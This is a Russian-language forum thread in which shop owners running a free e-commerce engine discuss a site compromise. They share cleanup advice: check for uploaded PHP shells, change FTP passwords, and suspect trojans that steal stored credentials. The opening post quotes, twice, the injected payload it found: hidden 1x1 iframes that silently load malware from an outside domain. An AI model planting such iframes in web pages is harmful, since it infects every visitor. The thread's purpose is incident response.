Мне "поломали" магазин?

Статус
В этой теме нельзя размещать новые ответы.
S

SSSonar

Создатель
Регистрация
11 Янв 2009
Сообщения
43
Реакции
1
На прошлой неделе было замечено, что мой сайт на SS Free не работает. Порылся в дримвьювере и вот что обнаружил.

КАК и КТО мог прописать в код index.php (и ещё в одном месте) в самом конце страницы???:


?><html><body><iframe src="http://betstarwager.cn/in.cgi?cocacola70" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://betstarwager.cn/in.cgi?cocacola64" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://betstarwager.cn/in.cgi?cocacola62" width=1 height=1 style="visibility: hidden"></iframe></body></html>


по ссылке не ходите, там троян!!!!

Эту хрень вычистил, но в админку не могу войти. Залил на сайт файл forgot_password.php. Обновил пароль и логин в админку. Один фиг. Если неправильно вводить, то предупреждает, что данные не верные. Если вводить прально, то тупо не входит и все...
Во блин))
 
SSSonar написал(а):
На прошлой неделе было замечено, что мой сайт на SS Free не работает. Порылся в дримвьювере и вот что обнаружил.

КАК и КТО мог прописать в код index.php (и ещё в одном месте) в самом конце страницы???:


?><html><body><iframe src="http://betstarwager.cn/in.cgi?cocacola70" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://betstarwager.cn/in.cgi?cocacola64" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://betstarwager.cn/in.cgi?cocacola62" width=1 height=1 style="visibility: hidden"></iframe></body></html>
Нажмите для раскрытия...

была таже фигня от cocacola.тоже в двух файлах,один и з которых индекс.пхп. что это могла значить?сейчас тьфу-тьфу все нормально
 
Проверь комп на вирусы, поменяй FTP пароли. И не сохраняй пароли в ftp клиентах или через что ты там сидишь... и вирус мог вставить код не только в index.php, так что проверь все файлы изменённые за последнее время. по идее они все изменены в одно и то же время.
 
Еще посмотри в папках product_files и products_pictures файлы php, там их быть не должно, если есть, значит залили шелл.
 
А чего ты ждал он ври версии? У нее почти все децкие дырки шопа, и их причем не заделали (ну мож позаделывали чет то). Короче ничего серёзного он фри версии не пытайся выжать.
 
PAM3EC написал(а):
Проверь комп на вирусы, поменяй FTP пароли. И не сохраняй пароли в ftp клиентах или через что ты там сидишь... и вирус мог вставить код не только в index.php, так что проверь все файлы изменённые за последнее время. по идее они все изменены в одно и то же время.
Нажмите для раскрытия...

я после этого вообще винду снес, так как от некоторых троянов так и не смог избавиться...пароли все поменял на хосте...файлы проверял по дате изменений... пока все норм..тфу, тфу... искал инфу в инете по аналогичной ситуации, вообще ничего не нашел.
Оказывается, я не один. mirus, тоже пострадал(

Добавлено через 1 минуту
IRIDON написал(а):
А чего ты ждал он ври версии? У нее почти все децкие дырки шопа, и их причем не заделали (ну мож позаделывали чет то). Короче ничего серёзного он фри версии не пытайся выжать.
Нажмите для раскрытия...

IRIDON, поентому щас и на локалке(поставл денвер) ваяю диз на новом движке)) А ты мне так с проблемкой категорий и не помог))))))))))))))))

Добавлено через 4 минуты
а ну и самое заподлячее - все кто заходил на сайт, автоматом отправлялся за трояном((
 
У меня тоже такая фигня была месяц назад.
Просто не надо пароли на компе хранить, вот и всё ;)

Кстати, так же у меня был заражён .htaccess файл находящийся в корне сервера.
 
PAM3EC написал(а):
У меня тоже такая фигня была месяц назад.
Просто не надо пароли на компе хранить, вот и всё ;)

Кстати, так же у меня был заражён .htaccess файл находящийся в корне сервера.
Нажмите для раскрытия...

я на ftp через TComander сижу, щас зачищу логинистые поля. Т.е получается, что вполне возможно, что какой-нить Backdoor троян стырил пароли с ini файла командера и все, пипец?))

Добавлено через 7 минут
а, забыл добавить:

зачистил всю хрень на сайте, снес винду. поставил новую. Накачал заплаток к ней. Поставил вместо нода каспера. Установил Anti-Malware(этот сразу нашел 16 спящих троянов в системе в архивах - каспер, нод молчали), установил и просканил Avz, Dr.Web, Trojan Remover. Затем воткнул Outpost Firewall (поставил в режим полной блокировки) и после этого чуть-чуть успокоился))))))))
 
SSSonar написал(а):
я на ftp через TComander сижу, щас зачищу логинистые поля. Т.е получается, что вполне возможно, что какой-нить Backdoor троян стырил пароли с ini файла командера и все, пипец?))
Нажмите для раскрытия...
Так оно и есть.
 
а никто не рассматривал вариант взлома хостера тупо? Получили рут и на все сайты повесили троя. Просто так что будут выборочно вешать маленькая вероятность
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху